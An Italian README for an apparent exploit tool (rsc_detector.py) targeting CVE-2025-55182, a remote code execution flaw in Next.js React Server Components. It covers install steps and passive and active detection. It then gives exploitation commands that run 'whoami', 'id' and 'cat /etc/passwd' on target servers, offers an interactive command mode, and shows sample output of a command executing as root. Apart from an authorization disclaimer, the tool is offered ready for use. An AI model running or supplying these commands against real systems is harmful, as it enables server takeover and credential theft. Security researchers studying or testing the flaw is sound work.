
Uno scanner di sicurezza basato su Python per rilevare e sfruttare le vulnerabilità dei **React Server Components (RSC)** nelle applicazioni Next.js. Questo strumento esegue rilevamento passivo, fingerprinting attivo e test di sfruttamento RCE.
Uno scanner di sicurezza basato su Python per rilevare e sfruttare le vulnerabilità dei React Server Components (RSC) nelle applicazioni Next.js. Questo strumento esegue rilevamento passivo, fingerprinting attivo e test di sfruttamento RCE.
⚠️ AVVERTENZA: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Ottieni sempre un'autorizzazione scritta prima di effettuare test.
✅ Rilevamento passivo - Analizza HTML, header e struttura delle pagine per individuare indicatori RSC
✅ Fingerprinting attivo - Invia header specifici RSC per rilevare le risposte del server
✅ Analisi degli header HTTP - Identifica gli header relativi a Next.js e RSC
✅ Sfruttamento RCE - Esegue comandi su server vulnerabili (se sfruttabile)
✅ Output colorato nel terminale - Feedback visivo migliorato per una migliore leggibilità
✅ Modalità interattiva - Esegui più comandi in modalità di sfruttamento
✅ Decodifica robusta - Gestisce payload compressi gzip e payload binari
Clona il repository
git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
cd CVE-2025-55182
Installa le dipendenze
pip install -r requirements.txt
Pacchetti richiesti:
requests>=2.28.0 - Libreria client HTTPurllib3>=1.26.0 - Utility HTTP avanzatecolorama>=0.4.6 - Colori del terminale (compatibile con Windows)beautifulsoup4 - Parsing HTMLpython rsc_detector.py https://example.com
python rsc_detector.py https://example.com --exploit
python rsc_detector.py https://example.com --exploit --cmd "whoami"
python rsc_detector.py https://example.com --exploit
Quindi inserisci i comandi al prompt (digita quit per uscire).
| Opzione | Descrizione |
|---|---|
<URL> | URL del target (obbligatorio). Antepone automaticamente https:// se mancante |
--exploit | Abilita lo sfruttamento RCE dopo il rilevamento |
--cmd <command> | Esegue un comando specifico (da usare con --exploit) |
Rileva la vulnerabilità RSC:
python rsc_detector.py https://target.com
Sfrutta ed esegui il comando id:
python rsc_detector.py https://target.com --exploit --cmd "id"
Sfrutta ed esegui il comando cat /etc/passwd:
python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"
Modalità interattiva (più comandi):
python rsc_detector.py https://target.com --exploit
window.__next_f (Next.js App Router)text/x-component__NEXT_DATA__ e le importazioni Next.jsServer, Vary e X-Nextjs-CacheRSC: 1[*] Starting RSC Detection Scan on: https://example.com
====================================================================
[1] Running Passive Scan...
Status: DETECTED
Score: 80/100
- Found: window.__next_f (App Router)
[2] Analyzing Headers...
- Vary header includes RSC: ...
[3] Running Active Fingerprint...
Status: DETECTED
- Response Content-Type became text/x-component
- Vary header contains 'RSC'
====================================================================
[FINAL RESULT] VULNERABLE
[!] This application appears to be vulnerable to RSC-based attacks!
Consider: RCE exploitation may be possible
[*] Executing command: whoami
[+] Command executed successfully!
[OUTPUT]
root
CVE-2025-55182 sfrutta:
child_process.execSync()Questo strumento è RIGOROSAMENTE RISERVATO A TEST DI SICUREZZA AUTORIZZATI:
L'accesso non autorizzato a sistemi informatici è illegale ai sensi di:
Se scopri una vulnerabilità utilizzando questo strumento:
Lo strumento ignora la verifica SSL per impostazione predefinita. Per abilitarla:
detector = RSCDetector(url, verify_ssl=True)
Lo strumento automaticamente:
Aumenta il timeout nel codice:
response = self.session.get(self.url, timeout=30) # 30 seconds
CVE-2025-55182/
├── README.md # This file
├── requirements.txt # Python dependencies
├── rsc_detector.py # Main scanner & exploit engine
├── rsc_cli.py # CLI utilities (if present)
├── script.py # Additional scripts (if present)
├── COLOR_GUIDE.md # Color output documentation
└── .gitignore # Git ignore rules
requests>=2.28.0 # HTTP requests
urllib3>=1.26.0 # Advanced HTTP
beautifulsoup4>=4.11.0 # HTML parsing
colorama>=0.4.6 # Terminal colors (Windows)
Installa tutto in una volta:
pip install -r requirements.txt